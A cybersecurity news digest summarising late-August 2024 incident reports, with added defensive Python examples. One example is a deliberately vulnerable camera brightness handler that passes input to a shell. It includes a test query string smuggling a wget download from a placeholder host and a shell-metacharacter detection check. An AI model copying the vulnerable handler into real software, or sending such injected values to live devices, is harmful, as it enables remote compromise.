Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12788
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-08-29 18:42:36 | theregister | CYBERCRIME | Sysadmin Faces 35 Years for Ransom Extortion and IT Sabotage | Daniel Rhyne, a 57-year-old former infrastructure engineer from Kansas City, Missouri, is accused of orchestrating an extortion scheme against his employer, an industrial company in New Jersey.
Rhyne allegedly locked the IT administrators out of the network by changing the passwords of domain and local accounts on 3,284 workstations and 254 servers.
He then demanded a ransom in an email to the company's employees, threatening to shut down 40 servers a day and claiming to have erased all backups.
Rhyne reportedly used Windows' net user command and Sysinternals' PsPasswd to perform the password changes, setting the new password to "TheFr0zenCrew!".
Evidence tying Rhyne to these actions includes logs from a hidden virtual machine on his company-issued laptop, suspicious web search history concerning password changes, and security footage of his unusual activities around company facilities.
If convicted, Rhyne could face up to 35 years in prison; the charges include extortion, intentional damage to a protected computer, and wire fraud. | Details |
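The two tools named in this story, net user and PsPasswd, both leave the same footprint: a Windows Security event 4724 ("An attempt was made to reset an account's password") on the domain controller for domain accounts and on the local host for local accounts. The following detection is an added example, not code from The Register's article or from the case file: it scans constructed sample events (the account and task names are hypothetical) for one subject resetting an abnormal number of passwords inside a sliding window, then correlates any scheduled tasks (event 4698) created by the same subject.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Windows Security events (not real logs). Fields:
# (timestamp, event_id, subject_account, detail). Event 4724 = password reset
# attempt; 4698 = scheduled task created. Account and task names are hypothetical.
SAMPLE_EVENTS = []
_t0 = datetime.fromisoformat("2023-11-25T08:00:00")
for i in range(60):  # one service account resets 60 passwords in one minute
    SAMPLE_EVENTS.append(((_t0 + timedelta(seconds=i)).isoformat(), 4724,
                          "CORP\\svc_backup", f"CORP\\user{i:03d}"))
SAMPLE_EVENTS.append(("2023-11-25T08:01:30", 4698, "CORP\\svc_backup",
                      "\\Maintenance\\ResetAdmins"))
for ts, user in [("2023-11-25T09:00:00", "CORP\\alice"),
                 ("2023-11-25T09:20:00", "CORP\\bob"),
                 ("2023-11-25T09:40:00", "CORP\\carol")]:
    SAMPLE_EVENTS.append((ts, 4724, "CORP\\helpdesk1", user))  # normal helpdesk pace


def detect_mass_resets(events, window=timedelta(minutes=5), threshold=20):
    """Return one alert per subject whose 4724 events reach `threshold`
    inside any sliding `window`. Two-pointer scan over sorted timestamps."""
    by_subject = defaultdict(list)
    for ts, event_id, subject, _ in events:
        if event_id == 4724:
            by_subject[subject].append(datetime.fromisoformat(ts))
    alerts = []
    for subject, times in by_subject.items():
        times.sort()
        start, best = 0, (0, None, None)
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count > best[0]:
                best = (count, times[start], t)
        if best[0] >= threshold:
            alerts.append({"subject": subject, "count": best[0],
                           "first": best[1].isoformat(), "last": best[2].isoformat()})
    return alerts


def scheduled_tasks_by(events, subjects):
    """Correlation step: scheduled tasks (4698) created by already-suspicious subjects."""
    return [(ts, subject, task) for ts, event_id, subject, task in events
            if event_id == 4698 and subject in subjects]


def triage(events):
    """Run both steps and hand back what an analyst would want to see first."""
    alerts = detect_mass_resets(events)
    tasks = scheduled_tasks_by(events, {a["subject"] for a in alerts})
    return {"alerts": alerts, "tasks": tasks}


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The threshold and window are tuning knobs: a helpdesk account legitimately resets a handful of passwords per hour, so three resets spread over forty minutes never trip the rule, while sixty in one minute does. Insider cases like this one are usually caught after the fact, but the same query run continuously against a SIEM turns the burst itself into the alert.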
| 2024-08-29 18:31:59 | theregister | CYBERCRIME | Sysadmin Faces 35 Years for Ransom and Fraud Scheme | Daniel Rhyne, a former IT engineer, has been arrested and charged with locking administrators out of his former employer's network and demanding a ransom.
Incident occurred in November 2023 at an industrial company based in New Jersey.
Rhyne changed the credentials of domain and local admin accounts on 3,284 workstations and 254 servers.
He deleted domain admin accounts and threatened to shut down 40 servers daily unless a ransom was paid.
He used Windows' net user command and Sysinternals' PsPasswd to change the account passwords to "TheFr0zenCrew!".
His illegal activities were traced back to a company-issued laptop and a hidden virtual machine.
Rhyne’s web search history included queries on changing passwords and remotely accessing admin accounts.
He faces up to 35 years in prison for charges of extortion, intentional damage to a protected computer, and wire fraud. | Details |
| 2024-08-29 18:31:58 | bleepingcomputer | MALWARE | Fake VPN Software Employed in Targeted Malware Campaign | Threat actors are using malware disguised as Palo Alto GlobalProtect, a popular VPN tool, to target Middle Eastern organizations.
The malware is suspected to be distributed via phishing emails, enticing users to install a rogue application named 'setup.exe'.
Upon execution, the malware masquerades as a standard installation of GlobalProtect and runs stealthily in the background.
It checks for sandbox environments before activating and connecting to a command and control (C2) server.
The malware profiles the infected machine and employs AES encryption to secure data transmissions to the C2.
The C2 domain leverages a name that mimics legitimate regional VPN portals, aiding in evasion.
The malware also sends beacons to an Interactsh domain; Interactsh is an open-source out-of-band interaction tool that has also been observed in use by APT groups.
Despite apparent sophistication and targeted nature of the attack, the identity of the threat actors remains unconfirmed. | Details |
| 2024-08-29 16:34:41 | theregister | MISCELLANEOUS | Google Doubles Rewards for Chrome Security Bug Reports | Google has updated its Chrome Vulnerability Rewards Program (VRP), significantly increasing payout amounts for bug discoveries.
The top reward for a Chrome security flaw is now $250,000, paid for a high-quality report demonstrating remote code execution in a non-sandboxed process.
Google aims to motivate more profound and high-quality research into vulnerabilities, especially regarding memory corruption issues.
The revised reward structure now emphasizes four categories: remote code execution, controlled memory write, general memory corruption, and baseline reports with proof-of-concepts.
Because MiraclePtr mitigates many use-after-free bugs, such bugs in MiraclePtr-protected code are now classified lower, while a separate reward of up to $250,128 is offered for a bypass of the protection itself.
Memory safety remains a critical priority due to the prevalence of severe bugs in large C++ codebases like Chrome.
Google's VRP enhancements reflect an ongoing effort to secure its browser against increasingly sophisticated threats. | Details |
| 2024-08-29 16:19:11 | thehackernews | NATION STATE ACTIVITY | Vietnamese Human Rights Group Hit by Prolonged Cyber Espionage | A Vietnamese human rights nonprofit has been subjected to a sustained cyberattack campaign for over four years.
Huntress, a cybersecurity firm, has attributed the attacks to APT32, also known as OceanLotus, a group linked with Vietnamese state interests.
APT32 is known for its cyber espionage efforts since 2012, targeting entities in Vietnam, Philippines, Laos, and Cambodia.
The cyberattacks utilize spear-phishing and "watering hole" tactics to deploy malware such as backdoors and information stealers.
In recent attacks tracked by Huntress, various methods were used to implant Cobalt Strike Beacons and other malicious payloads into the systems, facilitating data theft and surveillance.
The attacks also involved creating and manipulating scheduled tasks and Windows Registry keys to maintain persistence and control over compromised systems.
The disclosure coincides with separate reporting on cyber campaigns targeting South Korean users, part of a continued pattern of espionage activity in the region. | Details |
| 2024-08-29 16:03:37 | thehackernews | NATION STATE ACTIVITY | Russian Hackers Target Mongolian Sites with Safari, Chrome Exploits | Russian state-backed hackers, identified as APT29, exploited vulnerabilities in Apple Safari and Google Chrome to launch cyberattacks.
The attacks occurred from November 2023 to July 2024, targeting Mongolian government websites through watering hole tactics.
Exploits used were previously associated with commercial surveillance vendors like Intellexa and NSO Group, suggesting exploit reuse.
The intrusions aimed to steal browser cookies and sensitive information from mobile device users visiting the compromised sites.
Google Threat Analysis Group highlighted that the exploits, although patched, were effective against users on unpatched devices.
The compromised sites were Mongolian government portals, making government personnel and other visitors to those sites the likely targets.
This incident underscores the ongoing threat posed by nation-state actors using sophisticated techniques to exploit n-day vulnerabilities on popular browsers. | Details |
| 2024-08-29 15:48:06 | bleepingcomputer | MALWARE | Malware Uses Outdated IP Cameras to Launch DDoS Attacks | An unpatched vulnerability in AVTECH IP cameras, discontinued since 2019, is being exploited by Corona, a Mirai-based botnet.
The vulnerability, tracked as CVE-2024-7029, is a high-severity command-injection flaw in the camera's brightness setting that allows remote code execution.
The U.S. Cybersecurity and Infrastructure Security Agency has issued an advisory due to the camera's use in sensitive sectors such as healthcare and transportation.
Exploits for this vulnerability, allowing command injection via network requests, have been available publicly since at least 2019 but only recently used in active attacks by Corona.
Beginning March 18, 2024, attackers started exploiting this vulnerability to infect cameras and integrate them into a botnet for DDoS attacks.
No patch is available from AVTECH for these end-of-life devices, so they remain permanently vulnerable; the recommendation is to take the affected cameras offline and replace them.
Akamai's security team has captured live attack data and is monitoring additional exploits by the Corona botnet relevant to several other IoT vulnerabilities. | Details |
| 2024-08-29 13:09:26 | bleepingcomputer | NATION STATE ACTIVITY | Russian Hackers Target Mongolian Sites Using Spyware Vendor Exploits | Russian APT group APT29 used commercial spyware vendor-derived exploits to attack Mongolian government websites between November 2023 and July 2024.
Google's Threat Analysis Group identified and reported the use of already-patched vulnerabilities, which remained effective against unpatched iOS and Android devices.
APT29 employed "watering hole" tactics, compromising legitimate sites to deliver malicious payloads to targeted visitors.
The exploits used were nearly identical to those originally developed by spyware vendors like NSO Group and Intellexa for zero-day attacks.
Attacks leveraged known vulnerabilities such as CVE-2023-41993 for cookie theft on older iOS versions and CVE-2024-5274 and CVE-2024-4671 on Chrome, targeting Android users.
It remains unclear how APT29 acquired the said exploits, with possibilities including hacking, insider threats, or indirect collaboration.
The continued use of known exploits underlines the need to apply security updates promptly and across all devices. | Details |
| 2024-08-29 12:38:31 | theregister | CYBERCRIME | Brain Cipher Claims Data Theft from French Museums During Olympics | Brain Cipher ransomware group claims responsibility for the cyberattack on multiple French national museums, including Le Grand Palais, during the Olympic Games, intending to leak 300 GB of data.
The cyberattack occurred over August 3-4 and targeted a system centralizing financial data of about 40 institutions managed by Réunion des Musées Nationaux – Grand Palais (RMN-GP).
No details regarding the nature of the stolen data have been disclosed by Brain Cipher, other than the volume.
French law enforcement and the affected institutions have not released details on their recovery efforts or the investigation since the public disclosure on August 6.
French national cybersecurity (ANSSI) and data protection agencies (CNIL) have been informed but have provided minimal additional information.
Brain Cipher, a new cybercriminal group, allegedly uses a ransomware payload derived from the leaked LockBit 3.0 builder, featuring advanced code obfuscation and evasion techniques.
The incident reportedly did not compromise operational systems or the 2024 Olympic and Paralympic Games’ information systems. | Details |
| 2024-08-29 11:47:18 | thehackernews | NATION STATE ACTIVITY | U.S. Warns of Ongoing Iranian Ransomware and Cyber Espionage Attacks | U.S. agencies including CISA, FBI, and DC3 have issued warnings about an Iranian hacking group, Pioneer Kitten, linked to ransomware attacks across multiple sectors in the U.S. and other countries.
This group, also known by several aliases such as Fox Kitten and Lemon Sandstorm, operates under the guise of an Iranian IT company, Danesh Novin Sahand, and is connected to the government of Iran.
Pioneer Kitten's attacks target sectors like education, finance, healthcare, and defense, aiming to establish initial footholds in networks to facilitate further ransomware attacks in collaboration with affiliates like NoEscape, RansomHouse, and BlackCat.
The group gains initial access by exploiting vulnerabilities in internet-facing assets (External Remote Services in ATT&CK terms), then maintains access and escalates privileges with tools such as AnyDesk for remote access and Ligolo for tunnelling.
They are also involved in monetizing network access on underground marketplaces, offering full domain control and admin credentials to enable future ransomware activities.
Iranian state-sponsored operations also extend to additional groups like Peach Sandstorm which deploys custom malware and conducts espionage, targeting government, defense, and oil sectors among others.
Google’s Mandiant uncovered an HR-themed Iranian counterintelligence operation aiming to collect data on Iranians collaborating with adversaries, using fake recruitment websites. | Details |
| 2024-08-29 11:31:45 | thehackernews | CYBERCRIME | New Phishing Techniques Bypass MFA, Demand Innovative Defenses | AitM phishing attacks utilize toolkits to act as proxies between users and legitimate login portals, creating authentic-seeming interactions while stealing credentials and session control.
The article argues that these attacks let attackers bypass traditional controls such as Multi-Factor Authentication (MFA), Endpoint Detection and Response (EDR), and email filtering, posing significant risk to organizations.
Toolkits like Evilginx and Muraena employ reverse web proxy techniques, while others like EvilNoVNC use Browser-in-the-Middle (BitM) approaches for more direct control.
The development and commercialization of advanced phishing toolkits reflect the high value and ease of exploiting digital identities to access business applications and sensitive data.
Phishing attacks increasingly target Software as a Service (SaaS) applications and take place entirely outside the traditional network perimeter.
Traditional phishing defenses, which mostly block known-bad URLs and IPs, are ineffective against these attacks, so the article calls for a shift to more proactive and dynamic detection.
It suggests browser-based security controls that detect and block phishing at the point of credential entry, much as EDR does for attacks on the endpoint. | Details |
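Because an AitM proxy relays the victim's real login, the server-side artefact the attacker walks away with is a valid session token. The following is an added example, not code from the article and not the browser-based control it recommends: it shows one complementary server-side mitigation, binding the session token to a coarse client fingerprint with an HMAC so that a cookie lifted by the proxy cannot be replayed from the operator's own machine. The addresses, User-Agent strings and the per-process SERVER_KEY are constructed for the demo.

```python
import hashlib
import hmac
import ipaddress
import secrets

# Per-deployment secret; generated at import time for this demo only (hypothetical).
SERVER_KEY = secrets.token_bytes(32)


def client_fingerprint(ip: str, user_agent: str) -> str:
    """Coarse client fingerprint: network prefix (/24 for IPv4, /64 for IPv6) plus
    User-Agent. A prefix rather than the full address keeps NAT/mobile pool churn
    from logging users out on every request."""
    addr = ipaddress.ip_address(ip)
    prefix = 24 if addr.version == 4 else 64
    net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
    return hashlib.sha256(f"{net}|{user_agent}".encode()).hexdigest()


def issue_session(ip: str, user_agent: str) -> str:
    """Mint a session token whose HMAC tag commits to the client fingerprint.
    (A real system would also map the session id to a user record server-side.)"""
    sid = secrets.token_hex(16)
    tag = hmac.new(SERVER_KEY, f"{sid}|{client_fingerprint(ip, user_agent)}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{sid}.{tag}"


def validate_session(token: str, ip: str, user_agent: str) -> bool:
    """Accept the token only when presented by a client with the same fingerprint."""
    sid, sep, tag = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_KEY, f"{sid}|{client_fingerprint(ip, user_agent)}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)


def replay_scenario():
    """Constructed scenario: the victim authenticates through an AitM proxy at
    203.0.113.10 (the server sees the proxy's address and the victim's UA), then
    the operator replays the stolen token from 198.51.100.7."""
    ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0"
    token = issue_session("203.0.113.10", ua)
    return {
        "live_proxy": validate_session(token, "203.0.113.10", ua),
        "replay_other_host": validate_session(token, "198.51.100.7", ua),
        "replay_same_net_other_ua": validate_session(token, "203.0.113.77", "curl/8.5.0"),
        "same_net_same_ua": validate_session(token, "203.0.113.77", ua),
    }


if __name__ == "__main__":
    print(replay_scenario())
```

The caveat is visible in the scenario's first result: while the proxy is relaying live, it is the client the server fingerprinted, so binding does nothing against the attacker operating through the proxy itself. It only raises the cost of reusing the captured cookie elsewhere. Stopping the live relay needs an origin-bound factor such as a FIDO2/WebAuthn credential, which refuses to sign for the proxy's domain, or the in-browser checks the article describes.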
| 2024-08-29 11:11:14 | thehackernews | MALWARE | Hackers Exploit AVTECH IP Camera Flaw in Botnet Cyberattacks | A severe flaw in AVTECH IP cameras, tagged CVE-2024-7029, allows attackers to execute remote commands, contributing to botnet assembly.
The vulnerability affects the discontinued AVM1203 camera model and remains unpatched.
The U.S. Cybersecurity and Infrastructure Security Agency disclosed the flaw earlier this month, noting that it is remotely exploitable with low attack complexity.
Although the problem was known as early as February 2019 when a public proof of concept was created, it wasn’t assigned a CVE until August 2024.
Attackers have exploited the flaw since March 2024 to spread a Mirai variant named Corona Mirai.
The botnet infects systems, connecting to multiple hosts via Telnet, and has impacted sectors including healthcare, transportation, and financial services.
Related botnet activities have involved other devices like TP-Link and ASUS routers, indicating an ecosystem of interconnected botnet exploitations supporting varied malicious activities. | Details |
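Both AVTECH items above (the 15:48 and 11:11 entries) describe the same bug class: a request parameter for the brightness setting reaching a shell. The page does not give the exact CGI endpoint or parameter name, so the handler below is an added, illustrative example rather than AVTECH's firmware code: a vulnerable handler that splices the parameter into a shell command line (with `echo` standing in for the device utility, so running it is harmless) beside a hardened handler that validates the value as a bounded integer and passes it as a single argv element, plus a generic query-string triage check for the metacharacters such injections rely on.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Characters that let one shell command line become several.
SHELL_META = set(";|&`$\n\r<>")


def set_brightness_vulnerable(value: str) -> str:
    """Illustrative VULNERABLE handler: the request parameter is pasted into a
    shell command line. `echo` stands in for the real device utility, so this
    demo only prints, but a value of "50; echo INJECTED" still runs two commands."""
    proc = subprocess.run(f"echo brightness={value}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def set_brightness_hardened(value: str) -> str:
    """Hardened form: accept only a 0..100 integer and pass it as one argv
    element, never through a shell, so metacharacters have no meaning."""
    if not re.fullmatch(r"[0-9]{1,3}", value):
        raise ValueError("brightness must be a non-negative integer")
    level = int(value)
    if not 0 <= level <= 100:
        raise ValueError("brightness out of range 0..100")
    proc = subprocess.run(["echo", f"brightness={level}"],
                          capture_output=True, text=True)
    return proc.stdout


def flag_injection_attempt(query_string: str) -> list:
    """Log/WAF triage helper: names of query parameters whose URL-decoded value
    contains shell metacharacters. Generic; parameter names are not tied to the
    AVTECH endpoint, which the page does not specify."""
    params = parse_qs(query_string, keep_blank_values=True)
    return sorted(name for name, values in params.items()
                  if any(set(v) & SHELL_META for v in values))


if __name__ == "__main__":
    print(set_brightness_vulnerable("50; echo INJECTED"))
    print(flag_injection_attempt("action=brightness&value=50%3Bwget%20http%3A%2F%2F198.51.100.1%2Fbot"))
```

The triage check is deliberately crude (it will also flag legitimate values containing `$` or `>`), which is acceptable for reviewing web logs from a device whose only expected input is a number; on an end-of-life camera that cannot be patched, the realistic use of such a check is confirming exploitation before the device is pulled.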
| 2024-08-29 04:44:01 | thehackernews | CYBERCRIME | Telegram CEO Charged for Enabling Criminal Activities on Platform | French prosecutors charged Telegram CEO Pavel Durov with facilitating various criminal activities including the distribution of child sexual abuse material (CSAM), organized crime, and drug trafficking.
Durov was arrested upon entering France and is under investigation for not complying with law enforcement's requests for platform data interception.
As a condition of release, Durov posted €5 million bail, must remain in France, and must report to police twice a week.
The charges stem from a judicial investigation opened over Telegram's inadequate moderation, which prosecutors say allowed criminal activity to proliferate on the platform.
A cooperative assessment by various French and European agencies spurred the investigation, criticizing Telegram's lack of cooperation with judicial systems.
Despite Telegram's claim of regularly banning abusive groups and asserting their platform policy, French authorities moved ahead with legal action.
The case is a rare instance of a tech CEO being held personally accountable for users' activities on the platform; Durov's earlier history with the Russian social network VKontakte and previous hacking incidents are also noted in coverage. | Details |
| 2024-08-29 02:31:32 | theregister | MISCELLANEOUS | CrowdStrike Overcomes Major Update Issue with Strong Q2 Growth | CrowdStrike's Q2 fiscal year 2025 revenue increased by 32%, reaching $963.9 million, despite a significant software mishap in July.
The cybersecurity firm experienced issues with a Falcon sensor update that disrupted 8.5 million Windows machines, impacting global flights, medical services, and emergency services in the US.
In the wake of the incident, CrowdStrike trimmed its full-year revenue guidance from between $3.98 billion and $4.01 billion to between $3.89 billion and $3.90 billion.
CEO George Kurtz highlighted the resiliency of the business, noting substantial deal closures during the incident, with most delayed deals still in the pipeline.
Analysts believe that existing CrowdStrike customers, particularly those deeply integrated with multiple security products, are unlikely to switch providers due to the high costs and efforts required.
Delta Air Lines, despite planning to sue CrowdStrike and Microsoft for the outage-related setbacks, is unlikely to change security providers promptly due to their dependency on CrowdStrike’s services.
Industry response to CrowdStrike's handling of the incident has been generally positive, potentially mitigating long-term reputation damage. | Details |
| 2024-08-28 22:52:29 | bleepingcomputer | MALWARE | South Korean Hackers Exploit WPS Office Flaw to Deploy Spyware | South Korean cyberespionage group APT-C-60 used a zero-day vulnerability in WPS Office to install SpyGlace malware on targets in East Asia.
The vulnerability, known as CVE-2024-7262, affected versions of WPS Office from August 2023 to March 2024 and was patched silently by Kingsoft.
APT-C-60 manipulated WPS Office's protocol handlers to execute malicious code via crafted URLs hidden under decoy images in documents.
ESET identified another serious flaw, CVE-2024-7263, resulting from an incomplete fix of CVE-2024-7262, which could also enable arbitrary code execution.
The attacker’s methodology involved using MHTML files, allowing remote exploitation by embedding malicious hyperlinks.
SpyGlace, the malware delivered through this exploit, had been used in previous campaigns targeting HR and trade-related entities.
Users are advised to update their WPS Office software to the latest version, 12.2.0.17119, to secure both vulnerabilities.
ESET’s findings underscore the complexity and stealthiness of the attacks, urging users to be cautious of deceptive files appearing legitimate. | Details |